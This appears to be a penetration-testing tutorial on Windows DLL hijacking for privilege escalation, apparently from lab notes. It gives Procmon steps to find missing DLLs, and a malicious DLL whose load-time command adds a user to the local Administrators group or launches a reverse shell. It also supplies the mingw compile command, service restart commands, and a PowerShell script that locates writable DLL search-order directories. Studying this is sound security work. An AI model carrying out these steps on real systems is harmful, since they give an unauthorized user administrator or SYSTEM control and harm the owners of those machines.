DLL Hijacking

Overview

Dynamic Link Libraries (DLLs) are PE files like executables, but they can't be run on their own: they are shared libraries containing functions, classes, resources, variables etc. that executables load into their own process at run time.

When a Windows application or service starts up it looks for the DLLs it needs, checking a fixed list of directories in order (the DLL search order). If a DLL it asks for doesn't exist, or isn't where the program expects it, AND one of the directories searched along the way is writable by us, we can drop our own DLL there and the program will load it with its own privileges (for many services that is SYSTEM).

Escalation via DLL Hijacking

Simulation Steps:

  • Spin up Procmon

  • Add filter of "Result is NAME NOT FOUND then Include"

  • Add filter of "Path ends with .dll then Include"

  • This will show all of the NAME NOT FOUND for DLLs

  • We can exploit this if the location the DLL is searched for in is writable by our user

  • C:\Program Files and C:\Windows\System32 are normally NOT writable by a standard user, so look for custom application folders, C:\Temp-style directories, or entries on the PATH that are

  • Start the service and see if it looks for a DLL in a writable path (Procmon itself needs admin, so in an engagement you typically do this discovery on a lab box with the same software installed)

  • Once one has been found, put a fake DLL of that name there that calls a malicious executable, restart the service and pop a shell

In this case we compile a malicious DLL from a C program (windows_dll.c) whose DllMain runs a command as soon as the DLL is loaded. The command can add the user we're using to the local Administrators group, or launch a reverse shell:

cmd.exe /k net localgroup administrators Bob /add

Cross-compile it from Linux with mingw. The output name must match the DLL the service is looking for, and the architecture must match the service process (use i686-w64-mingw32-gcc for a 32-bit service):

x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Copy hijackme.dll into the writable location and restart the service. Stopping and starting needs SERVICE_STOP / SERVICE_START rights on that service (check with sc sdshow dllsvc or accesschk); otherwise wait for a reboot.

sc stop dllsvc
sc start dllsvc
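The Procmon steps above tell you which DLL name a service fails to find; the remaining question is which directory on the search path you can actually write to. The PowerShell below is an added example written for this page, not code from the original or from the lab it describes. It assumes the service is called dllsvc and the missing DLL is hijackme.dll (both taken from the page), that SafeDllSearchMode is on (the Windows default), and that the function names are my own. It resolves the service binary's directory, lists the directories searched for a DLL that isn't already loaded and isn't a KnownDLL, and tests each one by trying to create a file rather than reading the ACL.

```powershell
# Added example (not from the original page): find which DLL search-order
# directory for a service the current user can write to. Service name 'dllsvc'
# and DLL name 'hijackme.dll' come from the page; everything else is assumed.

function Get-ServiceImageDirectory {
    param([Parameter(Mandatory)][string]$ServiceName)
    # PathName is either "C:\Path\svc.exe" -args  or  C:\Path\svc.exe -args
    $svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) { throw "Service '$ServiceName' not found" }
    $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split '\s+')[0] }
    return Split-Path -Parent $exe
}

function Get-DllSearchOrder {
    param([Parameter(Mandatory)][string]$ApplicationDirectory)
    # Default search order with SafeDllSearchMode enabled. The "current
    # directory" for a service is its working directory, normally
    # C:\Windows\System32; here we use our own, so treat that entry as a hint.
    $dirs = @(
        $ApplicationDirectory,
        "$env:SystemRoot\System32",
        "$env:SystemRoot\System",
        $env:SystemRoot,
        (Get-Location).Path
    ) + @($env:Path -split ';' | Where-Object { $_ -ne '' })
    return $dirs | Select-Object -Unique
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    # ACL inspection is easy to get wrong (inheritance, deny ACEs, nested
    # groups), so just try to create and delete a file. A 'missing' PATH
    # directory that we could create ourselves is also exploitable, but that
    # is a separate check.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return 'missing' }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, 'x')
        Remove-Item -LiteralPath $probe -Force
        return 'writable'
    } catch {
        return 'read-only'
    }
}

function Find-WritableDllPaths {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$DllName
    )
    $appDir = Get-ServiceImageDirectory -ServiceName $ServiceName
    foreach ($dir in Get-DllSearchOrder -ApplicationDirectory $appDir) {
        [pscustomobject]@{
            Directory = $dir
            State     = Test-DirectoryWritable -Path $dir
            # If the real DLL already exists in an earlier directory, a copy
            # placed later in the order is never loaded.
            DllExists = Test-Path -LiteralPath (Join-Path $dir $DllName)
        }
    }
}

# Usage: the first 'writable' directory that comes before any directory where
# the DLL already exists is where hijackme.dll goes. Then bounce the service.
Find-WritableDllPaths -ServiceName 'dllsvc' -DllName 'hijackme.dll' | Format-Table -AutoSize
# Copy-Item .\hijackme.dll -Destination <writable directory from the table>
# sc.exe stop dllsvc; sc.exe start dllsvc
```

Run it as the low-privileged user you intend to escalate from, not as the admin account you used for Procmon, because the writability result is what matters and it differs per user. A directory that reports writable but comes after one where the DLL already exists is not useful: the loader stops at the first hit.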
